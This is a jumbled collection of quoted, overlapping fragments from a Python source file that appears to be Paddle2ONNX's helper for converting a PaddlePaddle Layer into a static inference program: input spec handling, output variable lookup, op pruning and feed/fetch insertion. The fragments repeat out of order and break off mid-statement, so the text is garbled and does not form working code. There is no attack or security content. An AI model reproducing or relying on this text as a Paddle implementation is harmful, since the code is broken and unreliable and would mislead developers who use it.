import flatten, pack_sequence_as from collections import OrderedDict from paddle.fluid", "None: # name is None, the input_spec only can be InputSpec raise ValueError(name_none_error", "main_program = main_program.clone() global_block = main_program.global_block() need_to_remove_op_index = [] for i, op in", "# avoid change user given input_spec inner_input_spec = None if input_spec is not", "# we only support VarBase spec, and actually, we only need the #", "= [] for i, var in enumerate(target_vars): uniq_target_vars.append(var) target_vars = uniq_target_vars target_var_name_list =", "= [ spec for spec in input_spec if isinstance(spec, paddle.static.InputSpec) ] if len(input_spec)", "OF ANY KIND, either express or implied. 
# See the License for the", "and jit.save(input_spec=[]) \" \\ \"and make sure they are consistent.\" name_no_exists_error = \"The", "Variable) for var in target_vars)): raise ValueError(\"'target_vars' should be a list of Variable.\")", "(bool(feeded_var_names) and all( isinstance(name, six.string_types) for name in feeded_var_names)): raise ValueError(\"'feed_var_names' should be", "from paddle.fluid.dygraph.layers import Layer from paddle2onnx.utils import logging from paddle2onnx.graph.graph_helper import prepend_feed_ops, append_fetch_ops", "concrete_program = static_func.concrete_program_specify_input_spec( inner_input_spec) elif 'forward' == attr_func: # transform in jit.save, if", "input_var_names = _get_input_var_names(concrete_program.inputs, inner_input_spec) # NOTE(chenweihang): [ Get output variables ] # the", "list[InputSpec], it should be packed with same structure # as original input_spec here.", "For output var, # we only support VarBase spec, and actually, we only", "not main_program.global_block().has_var(target_v.name): main_program.global_block().create_var( name=target_v.name, shape=target_v.shape, dtype=target_v.dtype, persistable=target_v.persistable) prepend_feed_ops(main_program, feeded_var_names) append_fetch_ops(main_program, fetch_var_names) main_program.desc._set_version() paddle.fluid.core.save_op_version_info(main_program.desc)", "# # Licensed under the Apache License, Version 2.0 (the \"License\" # you", "in declarative, which is equal to # @declarative with input_spec and jit.save without", "paddle.static.InputSpec): inner_input_spec.append(var) elif isinstance(var, (core.VarBase, core.eager.Tensor, Variable)): inner_input_spec.append( paddle.static.InputSpec.from_tensor(var)) else: # NOTE(Aurelius84): Support", "extra_var_info = dict() functions = dir(inner_layer) for attr_func in functions: static_func = getattr(inner_layer,", "\" \\ \"in configs.output_spec is the output tensor of \" \\ \"Layer.forward method.\"", "we only need the # var name of output, and we don't recommended", "import Layer from paddle2onnx.utils import logging from paddle2onnx.graph.graph_helper import prepend_feed_ops, append_fetch_ops def _get_input_var_names(inputs,", "var in target_vars] origin_program = main_program.clone() main_program = main_program.clone() global_block = main_program.global_block() need_to_remove_op_index", "import declarative from paddle.fluid import core from paddle.fluid import layers from paddle.nn import", "the name of example Tensor \" \\ \"in configs.output_spec is the output tensor", "[var.name for var in target_vars] origin_program = main_program.clone() main_program = main_program.clone() global_block =", "# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. 
# # Licensed under", "model\" ) break with program_guard(main_program): uniq_target_vars = [] for i, var in enumerate(target_vars):", "index in need_to_remove_op_index[::-1]: global_block._remove_op(index) main_program.desc.flush() main_program = main_program._prune_with_input( feeded_var_names=feeded_var_names, targets=target_vars) main_program = main_program._inference_optimize(prune_read_op=True)", "example Tensor \" \\ \"in input_spec is the same as the name of", "for spec in input_spec: if spec.name is None: warnings.warn(name_none_error % spec) elif spec.name", "for spec in input_spec: if spec.name is None: # name is None, the", "error # inner_input_spec is list[InputSpec], it should be packed with same structure #", "inner_input_spec: inner_input_spec = pack_sequence_as(input_spec, inner_input_spec) static_forward = declarative( inner_layer.forward, input_spec=inner_input_spec) concrete_program = static_forward.concrete_program", "the # var name of output, and we don't recommended to use output_spec", "paddle2onnx.utils import logging from paddle2onnx.graph.graph_helper import prepend_feed_ops, append_fetch_ops def _get_input_var_names(inputs, input_spec): name_none_error =", "name of InputSpec or example Tensor \" \\ \"in input_spec is the same", "result_list = [] output_vars_dict = OrderedDict() for var in flatten(outputs): if isinstance(var, Variable):", "elif isinstance(var, (core.VarBase, core.eager.Tensor, Variable)): inner_input_spec.append( paddle.static.InputSpec.from_tensor(var)) else: # NOTE(Aurelius84): Support non-Tensor type", "= main_program.clone() global_block = main_program.global_block() need_to_remove_op_index = [] for i, op in enumerate(global_block.ops):", "paddle.static.InputSpec) ] if len(input_spec) == len(input_var_names): # no prune result_list = input_var_names #", "elif output_spec is not None and len(output_spec) == len(output_vars_dict): result_list = output_vars_dict.values() for", "op._set_attr(device_attr_name, \"\") if op.type == 'auc': warnings.warn( \"please ensure that you have set", "other than 'forward' that need to be saved, the input 'input_spec' should be", "needless warning inner_input_spec = None else: continue input_var_names = _get_input_var_names(concrete_program.inputs, inner_input_spec) # NOTE(chenweihang):", "= static_func.concrete_program_specify_input_spec( inner_input_spec) elif 'forward' == attr_func: # transform in jit.save, if input_spec", "= _get_input_var_names(concrete_program.inputs, inner_input_spec) # NOTE(chenweihang): [ Get output variables ] # the rule", "of output, and we don't recommended to use output_spec output_vars = _get_output_vars(concrete_program.outputs, output_spec)", "\\ \"in input_spec is the same as the name of InputSpec in \"", "not in input_var_names: warnings.warn(name_no_exists_error % spec.name) else: # do nothing pass else: #", "All Rights Reserved. 
# # Licensed under the Apache License, Version 2.0 (the", "paddle.DataParallel): inner_layer = layer._layers else: inner_layer = layer # avoid change user given", "\" \\ \"and make sure they are consistent.\" name_no_exists_error = \"The tensor `%s`", "import os import numpy as np import inspect import six import paddle from", "if isinstance(var, Variable): output_vars_dict[var.name] = var if output_spec is None: result_list = output_vars_dict.values()", "be None, but received the type of 'input_spec' is %s.\" % type(input_spec)) if", "\"feed\" or op.type == \"fetch\": need_to_remove_op_index.append(i) for index in need_to_remove_op_index[::-1]: global_block._remove_op(index) main_program.desc.flush() main_program", "elif export_for_deployment: if not (bool(target_vars) and all(isinstance(var, Variable) for var in target_vars)): raise", "as original input_spec here. if inner_input_spec: inner_input_spec = pack_sequence_as(input_spec, inner_input_spec) static_forward = declarative(", "input_spec is incomplete, declarative will throw error # inner_input_spec is list[InputSpec], it should", "software # distributed under the License is distributed on an \"AS IS\" BASIS,", "warnings.warn( \"please ensure that you have set the auc states to zeros before", "Apache License, Version 2.0 (the \"License\" # you may not use this file", "inner_input_spec.append( paddle.static.InputSpec.from_tensor(var)) else: # NOTE(Aurelius84): Support non-Tensor type in `input_spec`. inner_input_spec.append(var) extra_var_info =", "ValueError(\"'target_vars' should be a list of Variable.\") main_program = _get_valid_program(main_program) # remind user", "# Licensed under the Apache License, Version 2.0 (the \"License\" # you may", "TODO(paddle-dev): polish these code blocks if not (bool(feeded_var_names) and all( isinstance(name, six.string_types) for", "# # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to", "[v.name for v in target_vars] for target_v in target_vars: if not main_program.global_block().has_var(target_v.name): main_program.global_block().create_var(", "Support non-Tensor type in `input_spec`. inner_input_spec.append(var) extra_var_info = dict() functions = dir(inner_layer) for", "> 0: # TODO(paddle-dev): polish these code blocks if not (bool(feeded_var_names) and all(", "ValueError(\"'feed_var_names' should be a list of str.\") if isinstance(target_vars, Variable): target_vars = [target_vars]", "uniq_target_vars target_var_name_list = [var.name for var in target_vars] origin_program = main_program.clone() main_program =", "InputSpec in \" \\ \"`to_static` decorated on the Layer.forward method.\" result_list = []", "Rights Reserved. 
# # Licensed under the Apache License, Version 2.0 (the \"License\"", "**configs): paddle.jit.set_verbosity(0) prog_translator = ProgramTranslator() if not prog_translator.enable_to_static: raise RuntimeError( \"The Paddle2onnx doesn't", "all_ops = main_program.global_block().ops for op in all_ops: # clear device of Op device_attr_name", "support VarBase spec, and actually, we only need the # var name of", "but received input type is %s.\" % type(layer)) if isinstance(layer, paddle.DataParallel): inner_layer =", "target_v in target_vars: if not main_program.global_block().has_var(target_v.name): main_program.global_block().create_var( name=target_v.name, shape=target_v.shape, dtype=target_v.dtype, persistable=target_v.persistable) prepend_feed_ops(main_program, feeded_var_names)", "remind user to set auc_states to zeros if the program contains auc op", "under the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES", "governing permissions and # limitations under the License. from __future__ import absolute_import import", "input_var_names = [ var.name for var in flatten(inputs) if isinstance(var, Variable) ] if", "% var.name) else: for var in output_spec: if var.name not in output_vars_dict: raise", "input spec name not in input_var_names, only raise warning for spec in input_spec:", "the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law", "saving inference model\" ) break with program_guard(main_program): uniq_target_vars = [] for i, var", "% var.name) else: result_list.append(output_vars_dict[var.name]) return result_list @dygraph.base.switch_to_static_graph def get_program(layer, input_spec, output_spec, **configs): paddle.jit.set_verbosity(0)", "for spec in input_spec if isinstance(spec, paddle.static.InputSpec) ] if len(input_spec) == len(input_var_names): #", "\" \\ \"Please make sure the name of InputSpec or example Tensor \"", "need the # var name of output, and we don't recommended to use", "if not isinstance(layer, Layer): raise TypeError( \"The input of paddle2onnx should be 'Layer',", "\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express", "var if output_spec is None: result_list = output_vars_dict.values() elif output_spec is not None", "# NOTE(chenweihang): [ Get output variables ] # the rule is like [", "var in target_vars)): raise ValueError(\"'target_vars' should be a list of Variable.\") main_program =", "InputSepc's name in \" \\ \"to_static(input_spec=[]) and jit.save(input_spec=[]) \" \\ \"and make sure", "is %s.\" % type(layer)) if isinstance(layer, paddle.DataParallel): inner_layer = layer._layers else: inner_layer =", "and we don't recommended to use output_spec output_vars = _get_output_vars(concrete_program.outputs, output_spec) feeded_var_names =", "import ProgramTranslator, StaticFunction from paddle.fluid.layers.utils import flatten, pack_sequence_as from collections import OrderedDict from", "not exists. 
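# Aside (ours, not part of the module): a small runnable sketch of the
# filtering step above. The mixed list and the spec names are invented.
# Non-InputSpec entries are dropped before any name comparison happens.
_mixed = [paddle.static.InputSpec(shape=[None, 4], dtype='float32', name='x'),
          'not-a-spec',
          paddle.static.InputSpec(shape=[None, 1], dtype='int64', name='z')]
_only_specs = [s for s in _mixed if isinstance(s, paddle.static.InputSpec)]
# print([s.name for s in _only_specs])  -> ['x', 'z']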
\" \\ \"Please make sure the name of example Tensor \"", "required by applicable law or agreed to in writing, software # distributed under", "please set InputSepc's name in \" \\ \"to_static(input_spec=[]) and jit.save(input_spec=[]) \" \\ \"and", "i, var in enumerate(target_vars): uniq_target_vars.append(var) target_vars = uniq_target_vars target_var_name_list = [var.name for var", "do nothing pass else: # prune for spec in input_spec: if spec.name is", "applicable law or agreed to in writing, software # distributed under the License", "is not None and len(output_spec) == len(output_vars_dict): result_list = output_vars_dict.values() for var in", "spec.name) else: result_list.append(spec.name) return result_list def _get_output_vars(outputs, output_spec): name_no_exists_error = \"The tensor `%s`", "ValueError( \"If there are static functions other than 'forward' that need to be", "_get_input_var_names(inputs, input_spec): name_none_error = \"The %s's name is None. \" \\ \"When using", "input_spec's type is %s.\" % type(input_spec)) inner_input_spec = [] for var in flatten(input_spec):", "inner_input_spec.append(var) extra_var_info = dict() functions = dir(inner_layer) for attr_func in functions: static_func =", "a list of Variable.\") main_program = _get_valid_program(main_program) # remind user to set auc_states", "the rule is like [ Get input variables name ]. For output var,", "are consistent.\" name_no_exists_error = \"The tensor `%s` does not exists. \" \\ \"Please", "received input type is %s.\" % type(layer)) if isinstance(layer, paddle.DataParallel): inner_layer = layer._layers", "] # the rule is like [ Get input variables name ]. For", "from __future__ import absolute_import import os import numpy as np import inspect import", "in output_spec: if var.name not in output_vars_dict: warnings.warn(name_no_exists_error % var.name) else: for var", "else: # do nothing pass else: # prune for spec in input_spec: if", "input of paddle2onnx should be 'Layer', but received input type is %s.\" %", "is list[InputSpec], it should be packed with same structure # as original input_spec", "for op in all_ops: # clear device of Op device_attr_name = core.op_proto_and_checker_maker.kOpDeviceAttrName() op._set_attr(device_attr_name,", "or agreed to in writing, software # distributed under the License is distributed", "# @declarative with input_spec and jit.save without input_spec, # avoid needless warning inner_input_spec", "actually, we only need the # var name of output, and we don't", "output_spec): name_no_exists_error = \"The tensor `%s` does not exists. \" \\ \"Please make", "clear device of Op device_attr_name = core.op_proto_and_checker_maker.kOpDeviceAttrName() op._set_attr(device_attr_name, \"\") if op.type == 'auc':", "recommended to use output_spec output_vars = _get_output_vars(concrete_program.outputs, output_spec) feeded_var_names = input_var_names target_vars =", "CONDITIONS OF ANY KIND, either express or implied. 
# See the License for", "None: warnings.warn(name_none_error % spec) elif spec.name not in input_var_names: warnings.warn(name_no_exists_error % spec.name) else:", "isinstance(var, (core.VarBase, core.eager.Tensor, Variable)): inner_input_spec.append( paddle.static.InputSpec.from_tensor(var)) else: # NOTE(Aurelius84): Support non-Tensor type in", "var, # we only support VarBase spec, and actually, we only need the", "spec name not in input_var_names, only raise warning for spec in input_spec: if", "in all_ops: # clear device of Op device_attr_name = core.op_proto_and_checker_maker.kOpDeviceAttrName() op._set_attr(device_attr_name, \"\") if", "__future__ import absolute_import import os import numpy as np import inspect import six", "flatten(outputs): if isinstance(var, Variable): output_vars_dict[var.name] = var if output_spec is None: result_list =", "attr_func in dir(inner_layer): static_func = getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction) and 'forward'", "Layer): raise TypeError( \"The input of paddle2onnx should be 'Layer', but received input", "received the type of 'input_spec' is %s.\" % type(input_spec)) if not isinstance(input_spec, (list,", "_get_valid_program from paddle.fluid.dygraph.dygraph_to_static.program_translator import ProgramTranslator, StaticFunction from paddle.fluid.layers.utils import flatten, pack_sequence_as from collections", "writing, software # distributed under the License is distributed on an \"AS IS\"", "paddle.fluid.dygraph.jit import declarative from paddle.fluid import core from paddle.fluid import layers from paddle.nn", "\\ \"in configs.output_spec is the output tensor of \" \\ \"Layer.forward method.\" result_list", "\"fetch\": need_to_remove_op_index.append(i) for index in need_to_remove_op_index[::-1]: global_block._remove_op(index) main_program.desc.flush() main_program = main_program._prune_with_input( feeded_var_names=feeded_var_names, targets=target_vars)", "name=target_v.name, shape=target_v.shape, dtype=target_v.dtype, persistable=target_v.persistable) prepend_feed_ops(main_program, feeded_var_names) append_fetch_ops(main_program, fetch_var_names) main_program.desc._set_version() paddle.fluid.core.save_op_version_info(main_program.desc) main_program._copy_dist_param_info_from(origin_program) return main_program,", "that need to be saved, the input 'input_spec' should be None, but received", "You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 #", "uniq_target_vars = [] for i, var in enumerate(target_vars): uniq_target_vars.append(var) target_vars = uniq_target_vars target_var_name_list", "\"please ensure that you have set the auc states to zeros before saving", "= layer # avoid change user given input_spec inner_input_spec = None if input_spec", "prepend_feed_ops, append_fetch_ops def _get_input_var_names(inputs, input_spec): name_none_error = \"The %s's name is None. \"", "License. 
# You may obtain a copy of the License at # #", "from paddle.fluid import dygraph from paddle.fluid.dygraph.jit import declarative from paddle.fluid import core from", "functions other than 'forward' that need to be saved, the input 'input_spec' should", "2.0 (the \"License\" # you may not use this file except in compliance", "from paddle.fluid import layers from paddle.nn import Layer from paddle.fluid.framework import Block, ParamBase,", "= [] input_var_names = [ var.name for var in flatten(inputs) if isinstance(var, Variable)", "ValueError(name_no_exists_error % spec.name) else: result_list.append(spec.name) return result_list def _get_output_vars(outputs, output_spec): name_no_exists_error = \"The", "program contains auc op all_ops = main_program.global_block().ops for op in all_ops: # clear", "states to zeros before saving inference model\" ) break with program_guard(main_program): uniq_target_vars =", "output var, # we only support VarBase spec, and actually, we only need", "if not main_program.global_block().has_var(target_v.name): main_program.global_block().create_var( name=target_v.name, shape=target_v.shape, dtype=target_v.dtype, persistable=target_v.persistable) prepend_feed_ops(main_program, feeded_var_names) append_fetch_ops(main_program, fetch_var_names) main_program.desc._set_version()", "%s.\" % type(input_spec)) if not isinstance(input_spec, (list, tuple)): raise TypeError( \"The input input_spec", "from paddle.nn import Layer from paddle.fluid.framework import Block, ParamBase, Program, Variable, Parameter, program_guard", "inner_layer = layer._layers else: inner_layer = layer # avoid change user given input_spec", "OrderedDict from paddle.fluid import dygraph from paddle.fluid.dygraph.jit import declarative from paddle.fluid import core", "import absolute_import import os import numpy as np import inspect import six import", "compliance with the License. 
# You may obtain a copy of the License", "\\ \"to_static(input_spec=[]) and jit.save(input_spec=[]) \" \\ \"and make sure they are consistent.\" name_no_exists_error", "\\ \"`to_static` decorated on the Layer.forward method.\" result_list = [] input_var_names = [", "main_program = concrete_program.main_program.clone() export_for_deployment = True if isinstance(feeded_var_names, six.string_types): feeded_var_names = [feeded_var_names] elif", "feeded_var_names=feeded_var_names, targets=target_vars) main_program = main_program._inference_optimize(prune_read_op=True) fetch_var_names = [v.name for v in target_vars] for", "var.name for var in flatten(inputs) if isinstance(var, Variable) ] if input_spec is None:", "dir(inner_layer): static_func = getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction) and 'forward' != attr_func:", "feeded_var_names)): raise ValueError(\"'feed_var_names' should be a list of str.\") if isinstance(target_vars, Variable): target_vars", "'auc': warnings.warn( \"please ensure that you have set the auc states to zeros", "feeded_var_names = input_var_names target_vars = output_vars main_program = concrete_program.main_program.clone() export_for_deployment = True if", "i, op in enumerate(global_block.ops): op.desc.set_is_target(False) if op.type == \"feed\" or op.type == \"fetch\":", "isinstance(layer, paddle.DataParallel): inner_layer = layer._layers else: inner_layer = layer # avoid change user", "\" \\ \"Please make sure the name of example Tensor \" \\ \"in", "if isinstance(layer, paddle.DataParallel): inner_layer = layer._layers else: inner_layer = layer # avoid change", "inner_input_spec.append(var) elif isinstance(var, (core.VarBase, core.eager.Tensor, Variable)): inner_input_spec.append( paddle.static.InputSpec.from_tensor(var)) else: # NOTE(Aurelius84): Support non-Tensor", "= getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction) and 'forward' != attr_func: raise ValueError(", "None and len(output_spec) == len(output_vars_dict): result_list = output_vars_dict.values() for var in output_spec: if", "% type(input_spec)) inner_input_spec = [] for var in flatten(input_spec): if isinstance(var, paddle.static.InputSpec): inner_input_spec.append(var)", "input_spec if isinstance(spec, paddle.static.InputSpec) ] if len(input_spec) == len(input_var_names): # no prune result_list", "as np import inspect import six import paddle from paddle.fluid.io import _get_valid_program from", "if not (bool(feeded_var_names) and all( isinstance(name, six.string_types) for name in feeded_var_names)): raise ValueError(\"'feed_var_names'", "in input_var_names: # the input_spec can be `InputSpec` or `VarBase` raise ValueError(name_no_exists_error %", "of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable", "output_spec: if var.name not in output_vars_dict: warnings.warn(name_no_exists_error % var.name) else: for var in", "# the input_spec can be `InputSpec` or `VarBase` raise ValueError(name_no_exists_error % spec.name) else:", "\"The input input_spec should be 'list', but received input_spec's type is %s.\" %", "inner_input_spec) # NOTE(chenweihang): [ Get output variables ] # the rule is like", "var in enumerate(target_vars): uniq_target_vars.append(var) target_vars = uniq_target_vars target_var_name_list = [var.name for var in", "len(feeded_var_names) > 0: # TODO(paddle-dev): polish these code blocks if not (bool(feeded_var_names) and", "input_spec can be `InputSpec` or `VarBase` raise 
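# Aside (ours): a hypothetical trace of the three branches above, with
# invented output names. Suppose outputs flatten to {'out_a': A, 'out_b': B}:
#   output_spec is None                -> [A, B] (everything is kept)
#   output_spec names both outputs     -> [A, B], plus a warning for any
#                                         name that does not exist
#   output_spec names a strict subset  -> only the named vars, and a
#                                         ValueError for unknown names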
@dygraph.base.switch_to_static_graph
def get_program(layer, input_spec, output_spec, **configs):
    paddle.jit.set_verbosity(0)
    prog_translator = ProgramTranslator()
    if not prog_translator.enable_to_static:
        raise RuntimeError(
            "Paddle2onnx doesn't work when setting ProgramTranslator.enable "
            "to False.")
    if not isinstance(layer, Layer):
        raise TypeError(
            "The input of paddle2onnx should be 'Layer', but received input "
            "type is %s." % type(layer))

    if isinstance(layer, paddle.DataParallel):
        inner_layer = layer._layers
    else:
        inner_layer = layer

    # avoid changing the user-given input_spec
    inner_input_spec = None
    if input_spec is not None:
        for attr_func in dir(inner_layer):
            static_func = getattr(inner_layer, attr_func, None)
            if isinstance(static_func,
                          StaticFunction) and 'forward' != attr_func:
                raise ValueError(
                    "If there are static functions other than 'forward' that "
                    "need to be saved, the input 'input_spec' should be None, "
                    "but received the type of 'input_spec' is %s." %
                    type(input_spec))
        if not isinstance(input_spec, (list, tuple)):
            raise TypeError(
                "The input input_spec should be 'list', but received "
                "input_spec's type is %s." % type(input_spec))
        inner_input_spec = []
        for var in flatten(input_spec):
            if isinstance(var, paddle.static.InputSpec):
                inner_input_spec.append(var)
            elif isinstance(var, (core.VarBase, core.eager.Tensor, Variable)):
                inner_input_spec.append(
                    paddle.static.InputSpec.from_tensor(var))
            else:
                # NOTE(Aurelius84): Support non-Tensor type in `input_spec`.
                inner_input_spec.append(var)

    extra_var_info = dict()
    functions = dir(inner_layer)
    for attr_func in functions:
        static_func = getattr(inner_layer, attr_func, None)
        if isinstance(static_func, StaticFunction):
            concrete_program = static_func.concrete_program_specify_input_spec(
                inner_input_spec)
        elif 'forward' == attr_func:
            # transform in jit.save: if input_spec is incomplete, declarative
            # will throw an error. inner_input_spec is list[InputSpec]; it
            # should be packed with the same structure as the original
            # input_spec here.
            if inner_input_spec:
                inner_input_spec = pack_sequence_as(input_spec,
                                                    inner_input_spec)
            static_forward = declarative(
                inner_layer.forward, input_spec=inner_input_spec)
            concrete_program = static_forward.concrete_program
            # the input_spec has been used in declarative, which is equal to
            # @declarative with input_spec and jit.save without input_spec;
            # avoid a needless warning
            inner_input_spec = None
        else:
            continue

        input_var_names = _get_input_var_names(concrete_program.inputs,
                                               inner_input_spec)

        # NOTE(chenweihang): [ Get output variables ]
        # the rule is like [ Get input variables name ]. For output vars,
        # we only support VarBase specs, and actually we only need the
        # var name of the output, so we don't recommend using output_spec.
        output_vars = _get_output_vars(concrete_program.outputs, output_spec)

        feeded_var_names = input_var_names
        target_vars = output_vars
        main_program = concrete_program.main_program.clone()
        export_for_deployment = True

        if isinstance(feeded_var_names, six.string_types):
            feeded_var_names = [feeded_var_names]
        elif export_for_deployment:
            if len(feeded_var_names) > 0:
                # TODO(paddle-dev): polish these code blocks
                if not (bool(feeded_var_names) and
                        all(isinstance(name, six.string_types)
                            for name in feeded_var_names)):
                    raise ValueError(
                        "'feed_var_names' should be a list of str.")

        if isinstance(target_vars, Variable):
            target_vars = [target_vars]
        elif export_for_deployment:
            if not (bool(target_vars) and
                    all(isinstance(var, Variable) for var in target_vars)):
                raise ValueError("'target_vars' should be a list of Variable.")

        main_program = _get_valid_program(main_program)

        # remind the user to set auc_states to zeros if the program contains
        # an auc op
        all_ops = main_program.global_block().ops
        for op in all_ops:
            # clear the device attribute of each op
            device_attr_name = core.op_proto_and_checker_maker.kOpDeviceAttrName()
            op._set_attr(device_attr_name, "")
            if op.type == 'auc':
                warnings.warn(
                    "please ensure that you have set the auc states to zeros "
                    "before saving the inference model")
                break

        with program_guard(main_program):
            uniq_target_vars = []
            for i, var in enumerate(target_vars):
                uniq_target_vars.append(var)
            target_vars = uniq_target_vars
        target_var_name_list = [var.name for var in target_vars]

        origin_program = main_program.clone()
        main_program = main_program.clone()
        global_block = main_program.global_block()
        need_to_remove_op_index = []
        for i, op in enumerate(global_block.ops):
            op.desc.set_is_target(False)
            if op.type == "feed" or op.type == "fetch":
                need_to_remove_op_index.append(i)
        for index in need_to_remove_op_index[::-1]:
            global_block._remove_op(index)
        main_program.desc.flush()

        main_program = main_program._prune_with_input(
            feeded_var_names=feeded_var_names, targets=target_vars)
        main_program = main_program._inference_optimize(prune_read_op=True)
        fetch_var_names = [v.name for v in target_vars]

        for target_v in target_vars:
            if not main_program.global_block().has_var(target_v.name):
                main_program.global_block().create_var(
                    name=target_v.name,
                    shape=target_v.shape,
                    dtype=target_v.dtype,
                    persistable=target_v.persistable)

        prepend_feed_ops(main_program, feeded_var_names)
        append_fetch_ops(main_program, fetch_var_names)
        main_program.desc._set_version()
        paddle.fluid.core.save_op_version_info(main_program.desc)
        main_program._copy_dist_param_info_from(origin_program)
        return main_program,
# See the License", "may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #", "result_list = [] input_var_names = [ var.name for var in flatten(inputs) if isinstance(var,", "[ spec for spec in input_spec if isinstance(spec, paddle.static.InputSpec) ] if len(input_spec) ==", "InputSpec raise ValueError(name_none_error % spec) elif spec.name not in input_var_names: # the input_spec", "static_func.concrete_program_specify_input_spec( inner_input_spec) elif 'forward' == attr_func: # transform in jit.save, if input_spec is", "you have set the auc states to zeros before saving inference model\" )", "import layers from paddle.nn import Layer from paddle.fluid.framework import Block, ParamBase, Program, Variable,", "os import numpy as np import inspect import six import paddle from paddle.fluid.io", "warning inner_input_spec = None else: continue input_var_names = _get_input_var_names(concrete_program.inputs, inner_input_spec) # NOTE(chenweihang): [", "should be a list of Variable.\") main_program = _get_valid_program(main_program) # remind user to", "incomplete, declarative will throw error # inner_input_spec is list[InputSpec], it should be packed", "http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing,", "name in feeded_var_names)): raise ValueError(\"'feed_var_names' should be a list of str.\") if isinstance(target_vars,", "in writing, software # distributed under the License is distributed on an \"AS", "[target_vars] elif export_for_deployment: if not (bool(target_vars) and all(isinstance(var, Variable) for var in target_vars)):", "isinstance(var, Variable) ] if input_spec is None: # no prune return input_var_names else:", "paddle from paddle.fluid.io import _get_valid_program from paddle.fluid.dygraph.dygraph_to_static.program_translator import ProgramTranslator, StaticFunction from paddle.fluid.layers.utils import", "Version 2.0 (the \"License\" # you may not use this file except in", "len(input_var_names): # no prune result_list = input_var_names # if input spec name not", "@dygraph.base.switch_to_static_graph def get_program(layer, input_spec, output_spec, **configs): paddle.jit.set_verbosity(0) prog_translator = ProgramTranslator() if not prog_translator.enable_to_static:", "# clear device of Op device_attr_name = core.op_proto_and_checker_maker.kOpDeviceAttrName() op._set_attr(device_attr_name, \"\") if op.type ==", "\"in configs.output_spec is the output tensor of \" \\ \"Layer.forward method.\" result_list =", "feeded_var_names = [feeded_var_names] elif export_for_deployment: if len(feeded_var_names) > 0: # TODO(paddle-dev): polish these", "main_program = main_program._inference_optimize(prune_read_op=True) fetch_var_names = [v.name for v in target_vars] for target_v in", "# See the License for the specific language governing permissions and # limitations", "the License is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR", "Variable.\") main_program = _get_valid_program(main_program) # remind user to set auc_states to zeros if", "var.name not in output_vars_dict: raise ValueError(name_no_exists_error % var.name) else: result_list.append(output_vars_dict[var.name]) return result_list @dygraph.base.switch_to_static_graph", "throw error # inner_input_spec is list[InputSpec], it should be packed with same structure", "received input_spec's type is %s.\" % type(input_spec)) inner_input_spec = [] for var in", "output tensor of \" \\ \"Layer.forward method.\" result_list = [] output_vars_dict = 
OrderedDict()", "[ Get output variables ] # the rule is like [ Get input", "Get output variables ] # the rule is like [ Get input variables", "can be `InputSpec` or `VarBase` raise ValueError(name_no_exists_error % spec.name) else: result_list.append(spec.name) return result_list", "jit.save, please set InputSepc's name in \" \\ \"to_static(input_spec=[]) and jit.save(input_spec=[]) \" \\", "% type(input_spec)) if not isinstance(input_spec, (list, tuple)): raise TypeError( \"The input input_spec should", "\\ \"Please make sure the name of example Tensor \" \\ \"in configs.output_spec", "sure the name of example Tensor \" \\ \"in configs.output_spec is the output", "if not prog_translator.enable_to_static: raise RuntimeError( \"The Paddle2onnx doesn't work when setting ProgramTranslator.enable to", "%s's name is None. \" \\ \"When using jit.save, please set InputSepc's name", "import dygraph from paddle.fluid.dygraph.jit import declarative from paddle.fluid import core from paddle.fluid import", "# inner_input_spec is list[InputSpec], it should be packed with same structure # as", "is None. \" \\ \"When using jit.save, please set InputSepc's name in \"", "is like [ Get input variables name ]. For output var, # we", "% spec.name) else: result_list.append(spec.name) return result_list def _get_output_vars(outputs, output_spec): name_no_exists_error = \"The tensor", "elif export_for_deployment: if len(feeded_var_names) > 0: # TODO(paddle-dev): polish these code blocks if", "= declarative( inner_layer.forward, input_spec=inner_input_spec) concrete_program = static_forward.concrete_program # the input_spec has been used", "`%s` does not exists. \" \\ \"Please make sure the name of example", "layer._layers else: inner_layer = layer # avoid change user given input_spec inner_input_spec =", "main_program = _get_valid_program(main_program) # remind user to set auc_states to zeros if the", "under the License. from __future__ import absolute_import import os import numpy as np", "in target_vars] origin_program = main_program.clone() main_program = main_program.clone() global_block = main_program.global_block() need_to_remove_op_index =", "\" \\ \"`to_static` decorated on the Layer.forward method.\" result_list = [] input_var_names =", "`InputSpec` or `VarBase` raise ValueError(name_no_exists_error % spec.name) else: result_list.append(spec.name) return result_list def _get_output_vars(outputs,", "= getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction): concrete_program = static_func.concrete_program_specify_input_spec( inner_input_spec) elif 'forward'", "you may not use this file except in compliance with the License. 
#", "main_program.global_block() need_to_remove_op_index = [] for i, op in enumerate(global_block.ops): op.desc.set_is_target(False) if op.type ==", "if input_spec is not None: for attr_func in dir(inner_layer): static_func = getattr(inner_layer, attr_func,", "output_vars_dict.values() for var in output_spec: if var.name not in output_vars_dict: warnings.warn(name_no_exists_error % var.name)", "in input_var_names, only raise warning for spec in input_spec: if spec.name is None:", "blocks if not (bool(feeded_var_names) and all( isinstance(name, six.string_types) for name in feeded_var_names)): raise", "set auc_states to zeros if the program contains auc op all_ops = main_program.global_block().ops", "'input_spec' is %s.\" % type(input_spec)) if not isinstance(input_spec, (list, tuple)): raise TypeError( \"The", "be a list of str.\") if isinstance(target_vars, Variable): target_vars = [target_vars] elif export_for_deployment:", "result_list = output_vars_dict.values() for var in output_spec: if var.name not in output_vars_dict: warnings.warn(name_no_exists_error", "= main_program.global_block() need_to_remove_op_index = [] for i, op in enumerate(global_block.ops): op.desc.set_is_target(False) if op.type", "License, Version 2.0 (the \"License\" # you may not use this file except", "of str.\") if isinstance(target_vars, Variable): target_vars = [target_vars] elif export_for_deployment: if not (bool(target_vars)", "of Op device_attr_name = core.op_proto_and_checker_maker.kOpDeviceAttrName() 